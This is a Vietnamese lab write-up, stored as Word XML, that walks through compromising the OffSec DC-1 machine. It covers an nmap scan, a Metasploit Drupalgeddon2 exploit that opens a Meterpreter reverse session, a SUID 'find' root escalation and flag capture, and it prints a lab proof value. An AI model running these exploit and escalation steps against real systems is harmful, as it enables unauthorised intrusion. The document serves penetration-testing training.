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DFE60A">
      <w:pPr>
        <w:spacing w:before="200" w:after="300"/>
        <w:jc w:val="center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Lab OffSec DC-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFCA88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Target: 192.168.204.193</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E6E7DD">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381D72D5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1: Quét cổng bằng Nmap</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="46A80D7B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xác định các dịch vụ đang mở trên target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8735C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08C5BB01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nmap -sC -sV -p- -T4 192.168.204.193</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECACF82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20AF70EE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PORT      STATE SERVICE VERSION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22/tcp    open  ssh     OpenSSH 6.0p1 Debian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80/tcp    open  http    Apache 2.2.22 - Drupal 7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111/tcp   open  rpcbind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50881/tcp open  status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733FA69A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Port 80 chạy Apache + Drupal 7 → là bề mặt tấn công chính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC8AED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2: Xác nhận phiên bản Drupal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB198A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xác nhận CMS đang chạy để tìm lỗ hổng tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B3FFEE">
      <w:pPr>
        <w:spacing w:before="100" w:after="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410710" cy="2951480"/>
            <wp:effectExtent l="0" t="0" r="889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E115E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Trang đăng nhập Drupal tại http://192.168.204.193</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519AADF1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36D615EE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curl -s http://192.168.204.193/ | grep -i generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A6851">
      <w:pPr>
        <w:spacing w:before="100" w:after="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530090" cy="892810"/>
            <wp:effectExtent l="0" t="0" r="1143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09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20E06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Meta tag xác nhận "Drupal 7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4434D085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15DE7B4F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&lt;meta name="Generator" content="Drupal 7 (http://drupal.org)" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8AC4DB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Xác nhận Drupal 7 → nghi ngờ lỗ hổng Drupalgeddon2 (ảnh hưởng Drupal 7.x trước bản 7.58).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E08600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3: Khai thác Drupalgeddon2 (CVE-2018-7600)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296B9D1C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khai thác lỗ hổng RCE không cần đăng nhập trong Form API của Drupal để chiếm shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7FC7B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01F0741D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msfconsole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use exploit/unix/webapp/drupal_drupalgeddon2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set RHOSTS 192.168.204.193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set RPORT 80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set LHOST 192.168.45.215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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4F9E4">
      <w:pPr>
        <w:spacing w:before="100" w:after="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316980" cy="1162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76811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E5BC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Exploit thành công, Meterpreter session được mở</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC8C81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67BE039C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[*] Meterpreter session 1 opened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(192.168.45.215:4444 -&gt; 192.168.204.193:41126)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2CE8AF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Chiếm được shell từ xa (RCE) trên target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54BA86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B6749F2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4: Ổn định shell &amp; kiểm tra quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31977BE8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chuyển shell thô sang shell tương tác đầy đủ để dễ thao tác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A984BAB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1BECF35E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shell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whoami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id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python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78285E9A">
      <w:pPr>
        <w:spacing w:before="100" w:after="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210175" cy="18478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6531B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Xác nhận quyền www-data (uid=33)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377E9964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6F823802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www-data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uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9A22C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Có shell tương tác nhưng chỉ ở quyền www-data (thấp) → cần leo quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71151679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5: Local Enumeration — tìm SUID binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378D9C0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tìm file có bit SUID (chạy với quyền chủ sở hữu, thường là root) để tìm đường leo quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1559575B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17CC99F8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find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD6E187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485223CA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/bin/su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/usr/bin/passwd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/usr/bin/find   &lt;-- SUID bất thường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/usr/lib/openssh/ssh-keysign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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D949BF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/usr/bin/find có SUID — đây là cấu hình sai, vì find hỗ trợ -exec, cho phép chạy lệnh tùy ý bằng quyền root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189076F6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6: Leo quyền root qua SUID find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2D413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lợi dụng -exec của find (đang có SUID) để bật shell với quyền root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B888347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0FD38202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find . -exec /bin/bash -p \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2145090D">
      <w:pPr>
        <w:spacing w:before="100" w:after="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34100" cy="1428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3F28">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shell root sau khi khai thác SUID find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1A6034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3FE49BEA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bash-4.2# whoami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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3789A84D">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Leo quyền thành công từ www-data lên root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D1F254">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
        <w:rPr>
          <w:b/>
          <w:bCs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Bước 7: Lấy Proof / Flag để nộp bài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616333A8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Mục đích: xác nhận toàn quyền hệ thống và lấy mã proof nộp lên portal OffSec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21B843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Lệnh sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F088D9">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="200"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find / -iname "proof.txt" 2&gt;/dev/null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cat /root/proof.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="C0392B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C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /root/thefinalflag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D3DCBF">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D13C6">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:before="80" w:after="200"/>
        <w:ind w:left="200" w:right="200"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>37f07eb3b6ccfb09e95b17767cb98793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Well done!!!!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Hopefully you've enjoyed this and learned some new skills.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You can let me know what you thought of this little journey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>by contacting me via Twitter - @DCAU7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2214A5BA">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DONE!</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId3" w:type="default"/>
      <w:footerReference r:id="rId4" w:type="default"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="994" w:right="994" w:bottom="994" w:left="994" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgNumType w:fmt="decimal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DB72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79EC94">
    <w:pPr>
      <w:pStyle w:val="15"/>
      <w:pBdr>
        <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
      </w:pBdr>
      <w:rPr>
        <w:rFonts w:hint="default"/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8C669A4"/>
    <w:rsid w:val="16FB6BF7"/>
    <w:rsid w:val="4FBA2DC0"/>
    <w:rsid w:val="5365345C"/>
    <w:rsid w:val="64605656"/>
    <w:rsid w:val="6D123629"/>
    <w:rsid w:val="76592B3A"/>
    <w:rsid w:val="7B195C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9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1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8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9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463</Words>
  <Characters>2263</Characters>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2671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2026-09-12T14:32:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>Trung Anh</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-12T14:45:08Z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eyJoZGlkIjoiNTk2MWFkOTdkYWJkMTBmYzQ4ODg5NzUzODhkODE5NmYiLCJ1c2VySWQiOiIxMzkyMjU0NjA0MzUwIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.28485</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>320F22272E6B438F96CD30235D4CDB6A_12</vt:lpwstr>
  </property>
</Properties>
</file>